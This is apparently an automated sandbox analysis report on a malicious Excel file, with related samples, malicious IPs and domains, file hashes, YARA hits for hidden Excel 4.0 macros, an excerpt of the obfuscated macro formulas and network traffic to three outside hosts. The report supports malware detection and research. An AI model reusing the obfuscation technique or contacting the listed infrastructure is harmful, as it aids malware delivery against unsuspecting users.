Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.109.32.63, 52.109.12.23, 52.109.76.35 Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, dual-a-0001.a-msedge.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net Execution Graph export aborted for target EXCEL.EXE, PID 2172 because there are no executed function Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.241.2.78	#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe	Get hash	malicious	Browse	www.entreiparaodigital.com/jdkn/?1b0=I3SbQcfk5mKncCcQGw+gNueSmbNJxTZBbu+zAfDoz/ZWf2NQtBtv1zSdSMyJHdn3WlwE&mJBHHf=B0DPf0S8Ibot
108.179.192.98	counter-1248368226.xls	Get hash	malicious	Browse
	counter-119221000.xls	Get hash	malicious	Browse
	counter-119221000.xls	Get hash	malicious	Browse
	tr.xls	Get hash	malicious	Browse
	tr.xls	Get hash	malicious	Browse
	counter-1389180325.xls	Get hash	malicious	Browse
	counter-1389180325.xls	Get hash	malicious	Browse
103.28.36.171	211094.exe	Get hash	malicious	Browse	www.nhadat9chu.com/iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
noithat117.vn	counter-1248368226.xls	Get hash	malicious	Browse	103.28.36.171
	counter-119221000.xls	Get hash	malicious	Browse	103.28.36.171
	counter-119221000.xls	Get hash	malicious	Browse	103.28.36.171
	tr.xls	Get hash	malicious	Browse	103.28.36.171
	tr.xls	Get hash	malicious	Browse	103.28.36.171
	counter-1389180325.xls	Get hash	malicious	Browse	103.28.36.171
	counter-1389180325.xls	Get hash	malicious	Browse	103.28.36.171
playsis.com.br	counter-1248368226.xls	Get hash	malicious	Browse	162.241.2.78
	counter-119221000.xls	Get hash	malicious	Browse	162.241.2.78
	counter-119221000.xls	Get hash	malicious	Browse	162.241.2.78
	tr.xls	Get hash	malicious	Browse	162.241.2.78
	tr.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1389180325.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1389180325.xls	Get hash	malicious	Browse	162.241.2.78
greenflag.esp.br	counter-119221000.xls	Get hash	malicious	Browse	108.179.192.98
	counter-119221000.xls	Get hash	malicious	Browse	108.179.192.98
	tr.xls	Get hash	malicious	Browse	108.179.192.98
	tr.xls	Get hash	malicious	Browse	108.179.192.98
	counter-1389180325.xls	Get hash	malicious	Browse	108.179.192.98
	counter-1389180325.xls	Get hash	malicious	Browse	108.179.192.98

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OIS1US	counter-1248368226.xls	Get hash	malicious	Browse	162.241.2.78
	a2SyRyTizn.exe	Get hash	malicious	Browse	162.241.203.110
	TSmtIL1EeJ.exe	Get hash	malicious	Browse	162.241.203.110
	counter-119221000.xls	Get hash	malicious	Browse	162.241.2.78
	counter-119221000.xls	Get hash	malicious	Browse	162.241.2.78
	tr.xls	Get hash	malicious	Browse	162.241.2.78
	tr.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1389180325.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1389180325.xls	Get hash	malicious	Browse	162.241.2.78
	PURCHASE ORDER HECTRO.xlsx	Get hash	malicious	Browse	162.241.85.81
	chase.xls	Get hash	malicious	Browse	162.241.2.167
	chase.xls	Get hash	malicious	Browse	162.241.2.167
	private-1915056036.xls	Get hash	malicious	Browse	162.241.2.167
	private-1915056036.xls	Get hash	malicious	Browse	162.241.2.167
	private-1910485378.xls	Get hash	malicious	Browse	162.241.2.167
	private-1910485378.xls	Get hash	malicious	Browse	162.241.2.167
	Amended Order.xlsx	Get hash	malicious	Browse	162.241.2.151
	aLTbT3KJXg.exe	Get hash	malicious	Browse	192.185.147.203
	qWeAgF7WNO.exe	Get hash	malicious	Browse	192.185.147.203
	Page_1of3#Ud83d#Udce0.html	Get hash	malicious	Browse	162.241.70.204
UNIFIEDLAYER-AS-1US	counter-1248368226.xls	Get hash	malicious	Browse	108.179.192.98
	CU-6431 report.xlsm	Get hash	malicious	Browse	162.240.9.126
	CU-6431 report.xlsm	Get hash	malicious	Browse	162.240.9.126
	DkX9HVJTmi.exe	Get hash	malicious	Browse	108.167.135.122
	Shipping report -17420.xlsx	Get hash	malicious	Browse	162.241.169.32
	SCAN_7295943480515097.xlsm	Get hash	malicious	Browse	162.240.9.126
	SCAN_7295943480515097.xlsm	Get hash	malicious	Browse	162.240.9.126
	INVOICE.exe	Get hash	malicious	Browse	162.214.80.6
	img20048901738_Pago.pdf.exe	Get hash	malicious	Browse	192.185.115.3
	PaCJ39hC4R.xlsx	Get hash	malicious	Browse	162.241.126.156
	PaCJ39hC4R.xlsx	Get hash	malicious	Browse	162.241.126.156
	New order documents. pdf..............exe	Get hash	malicious	Browse	108.179.232.76
	part-1500645108.xlsb	Get hash	malicious	Browse	162.241.62.201
	img20048901740_Pago.pdf.exe	Get hash	malicious	Browse	192.185.115.3
	part-1500645108.xlsb	Get hash	malicious	Browse	162.241.62.201
	shedy.exe	Get hash	malicious	Browse	162.241.218.172
	product list.xlsx	Get hash	malicious	Browse	162.241.218.178
	accounts...exe	Get hash	malicious	Browse	192.185.164.148
	New product of Aluminium Profile.exe	Get hash	malicious	Browse	192.185.84.191
	BL. AWSMUNDAR3606-21.exe	Get hash	malicious	Browse	162.241.148.56

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	ukmxWblFcs.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	Narudzba.0953635637.PDF.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	Orden de compra.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	EmployeeAssessment.html	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	bUSzS84fr4.dll	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	Tender SN980018277 & SN9901827 Signed Copy.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	CU-6431 report.xlsm	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	Rifc8lYWh7.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	umA9dNEzIh.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	Rifc8lYWh7.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	umA9dNEzIh.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	rU6eiJaifC.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	SCAN_7295943480515097.xlsm	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	Kqn63gUZFq.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	837375615376.dll	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	837375615376.dll	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	lzJWJgZhPc.exe	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	#U0420R#U04223445FM.htm	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	SMK_EFT_BILLPAY.html	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\62A0C483-7525-45C3-9021-D9D0BAA7B779 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	140163
Entropy (8bit):	5.358154429516242
Encrypted:	false
SSDEEP:	1536:ScQIfgxrBdA3gBwtnQ9DQW+zCb4Ff7nXbovidXiE6LWmE9:auQ9DQW+zJXfH
MD5:	194ED8DC6E6E9FC0B894576EBA1030DA
SHA1:	91C12CDE373DF4700BD254667AA2DD25AA4990B2
SHA-256:	7244698AEBF849E11174ADB5FBDC6E582C2475D4FC986692C5F3C02B84D437B2
SHA-512:	71AF6D56CD8AD0816F51A4523C04E664B8B942ABDE8F2329289855534B8559D67D592ED8E854CC1DE1E0C66D337B5EE23DFB322EF258AD9F5D4A448407F2FFCA
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T13:36:00">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A032B20.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF852A535A08A1983B.TMP Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.974047404887019
Encrypted:	false
SSDEEP:	768:nkxKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgALlNp:noKpb8rGYrMPe3q7Q0XV5xtezEsi8/dh
MD5:	6235D05472679068C67F48FDCF00B91D
SHA1:	8259DEBBFCAFDA24C2FEF013F0AF4F840B35B847
SHA-256:	9E32E87680CDB684D3D2BB47426999E90B6914D554B84ECBEE63A527D778E059
SHA-512:	50820596D0D1F9404EE4F8732EE1E9A1B7AB26BA1F344DF0F72974859C1056A0157D1F867782270DA8269DF6D6C874E23EC02EF8DB3C0DBC0613E840710BB632
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC6022B2B101620FE.TMP Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\counter-1248368226.xls Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 30 06:43:37 2021, Security: 0
Category:	dropped
Size (bytes):	132608
Entropy (8bit):	6.2763302357105974
Encrypted:	false
SSDEEP:	3072:xKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgRJyVceeiE/RzPQUu/zLOQo:xKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgz/
MD5:	0B49C3AF7CA3F0B4C6C0706CA1C27D40
SHA1:	AB90F79F25B6EA9E44CD6A927CA0CDC7E7C089CA
SHA-256:	31EB146BFD8F5B35A2509F6A22B57CC89D17591012B087D3A21379AD35EE06BB
SHA-512:	0430DBF9CEF861C21148F1DA1734A3EA4F69A0A669867E68861C91510BB63DABC29CAC362E768043E9679B6C5C26706CF0B0819E85AFE24B9929B1DCA867067B
Malicious:	true
Yara Hits:	Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\counter-1248368226.xls, Author: John Lambert @JohnLaTwC Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Source: C:\Users\user\Desktop\counter-1248368226.xls, Author: Joe Security
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....pratesh.=. B.....a.........=...........................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 30 06:43:37 2021, Security: 0
Entropy (8bit):	6.275934021202815
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	counter-1248368226.xls
File size:	132608
MD5:	30a0db47a66a3d3173457755bb166529
SHA1:	c852a219defe8ab726b72f8792386e35428b46dc
SHA256:	bdd97906934a97d1081e68ac8f71c98a169c4af705c17b73b69b3649df216885
SHA512:	ca0fb9713e25d2c3f1fa312c9318801ee7f97d4f0873501bd05de98bc0dc25020d7ae5f7fd88368dcbdc261c4a4d86a9ccc4c376ae85a014945b4cc7f572cb5d
SSDEEP:	3072:LKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgRJyVceeiE/RzPQUu/zLOQj:LKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgzE
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "counter-1248368226.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:
Last Saved By:
Create Time:	2015-06-05 18:19:34
Last Saved Time:	2021-11-30 06:43:37
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.436875318248
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . 8 . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S b r b u k 1 . . . . . S b o r 2 . . . . . S b 1 2 1 1 o r 1 . . . . . S h e e t . . . . . B o r 1 . . . . . B
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 38 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 f8 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.279171118094
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . 2 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 121786

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	121786
Entropy:	6.60410896716
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

2,6,=
9,2,=CHAR(Sbrbuk1!G26)

1,5,=CHAR(Sbrbuk1!R27)
12,1,e

15,6,=FORMULA(Bor1!C8,Bor2!B12)=FORMULA(Bor2!H4,Bor3!G3)=FORMULA(Bor3!C10,Bor4!A2)=FORMULA(Bor4!F9,Bor5!C12)=FORMULA(Bor5!J5,Bor6!B13)=FORMULA(Bor6!F2,Bor1!I3)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!B7&Bor2!B12&Sb1211or1!E1&Bor2!B12&Sb1211or1!C13&Bor2!B12&Sb1211or1!A2&Bor2!B12&Sb1211or1!D4&Bor1!I3&Sb1211or1!A11&Bor1!I3&Sb1211or1!F7,G35)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!B10&Bor1!I3&Sbor2!E2,G37)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!J5&Bor1!I3&Sbor2!S5,G39)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!I3&Bor2!B12&Sb1211or1!H10&Sb1211or1!K1&Bor6!B13&Sb1211or1!J8&Bor1!I3&Bor1!I3&Sbor2!G8&Bor1!I3&Sbor2!P3,G41)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!O10,G43)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!D14,G45)=FORMULA(Bor3!G3&Bor1!I3&Bor4!A2&Bor5!C12&Bor5!C12&Sb1211or1!O3&Bor6!B13&Sb1211or1!N6&Bor6!B13&Sb1211or1!Q2&Bor1!I3&Bor1!I3&Bor1!I3&Sbor2!M1&Bor6!B13&Sbor2!H16&Bor2!B12&Sb1211or1!P12&Bor2!B12&Sb1211or1!T1&Bor1!I3&Sbor2!L12,G47)=FORMULA(Bor3!G3&Sbrbuk1!M38&Sbrbuk1!M40&Sbrbuk1!M42&Sbrbuk1!M44&Sbrbuk1!M38&Sbrbuk1!L46,G49)

3,7,=CHAR(Sbrbuk1!E31)
11,1,r

2,8,C
7,2,=CHAR(Sbrbuk1!S32)

1,0,A
8,5,=CHAR(Sbrbuk1!J25)

4,9,=CHAR(Sbrbuk1!N29)
11,2,L

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 14:36:05.964247942 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:05.964301109 CET	443	49740	108.179.192.98	192.168.2.5
Dec 2, 2021 14:36:05.964391947 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:05.965723038 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:05.965745926 CET	443	49740	108.179.192.98	192.168.2.5
Dec 2, 2021 14:36:06.254270077 CET	443	49740	108.179.192.98	192.168.2.5
Dec 2, 2021 14:36:06.254451990 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:06.267846107 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:06.267863989 CET	443	49740	108.179.192.98	192.168.2.5
Dec 2, 2021 14:36:06.268205881 CET	443	49740	108.179.192.98	192.168.2.5
Dec 2, 2021 14:36:06.268285990 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:06.269103050 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:06.312886000 CET	443	49740	108.179.192.98	192.168.2.5
Dec 2, 2021 14:36:07.391335011 CET	443	49740	108.179.192.98	192.168.2.5
Dec 2, 2021 14:36:07.391459942 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:07.391468048 CET	443	49740	108.179.192.98	192.168.2.5
Dec 2, 2021 14:36:07.391520023 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:07.392064095 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:07.392093897 CET	443	49740	108.179.192.98	192.168.2.5
Dec 2, 2021 14:36:07.392106056 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:07.392164946 CET	49740	443	192.168.2.5	108.179.192.98
Dec 2, 2021 14:36:07.428347111 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:07.428394079 CET	443	49753	103.28.36.171	192.168.2.5
Dec 2, 2021 14:36:07.428493977 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:07.429033995 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:07.429058075 CET	443	49753	103.28.36.171	192.168.2.5
Dec 2, 2021 14:36:07.853271008 CET	443	49753	103.28.36.171	192.168.2.5
Dec 2, 2021 14:36:07.853400946 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:07.860223055 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:07.860265017 CET	443	49753	103.28.36.171	192.168.2.5
Dec 2, 2021 14:36:07.860630989 CET	443	49753	103.28.36.171	192.168.2.5
Dec 2, 2021 14:36:07.860718012 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:07.861891031 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:07.904881001 CET	443	49753	103.28.36.171	192.168.2.5
Dec 2, 2021 14:36:09.814369917 CET	443	49753	103.28.36.171	192.168.2.5
Dec 2, 2021 14:36:09.814439058 CET	443	49753	103.28.36.171	192.168.2.5
Dec 2, 2021 14:36:09.814516068 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:09.814547062 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:09.814785004 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:09.814805984 CET	443	49753	103.28.36.171	192.168.2.5
Dec 2, 2021 14:36:09.814829111 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:09.814852953 CET	49753	443	192.168.2.5	103.28.36.171
Dec 2, 2021 14:36:09.993818045 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:09.993860960 CET	443	49757	162.241.2.78	192.168.2.5
Dec 2, 2021 14:36:09.993948936 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:09.994574070 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:09.994594097 CET	443	49757	162.241.2.78	192.168.2.5
Dec 2, 2021 14:36:10.282840967 CET	443	49757	162.241.2.78	192.168.2.5
Dec 2, 2021 14:36:10.283027887 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:10.290045977 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:10.290071011 CET	443	49757	162.241.2.78	192.168.2.5
Dec 2, 2021 14:36:10.290528059 CET	443	49757	162.241.2.78	192.168.2.5
Dec 2, 2021 14:36:10.290625095 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:10.291395903 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:10.332876921 CET	443	49757	162.241.2.78	192.168.2.5
Dec 2, 2021 14:36:11.637247086 CET	443	49757	162.241.2.78	192.168.2.5
Dec 2, 2021 14:36:11.637335062 CET	443	49757	162.241.2.78	192.168.2.5
Dec 2, 2021 14:36:11.637336969 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:11.637392044 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:11.637824059 CET	49757	443	192.168.2.5	162.241.2.78
Dec 2, 2021 14:36:11.637845039 CET	443	49757	162.241.2.78	192.168.2.5
Dec 2, 2021 14:36:11.637861967 CET	49757	443	192.168.2.5	162.241.2.78
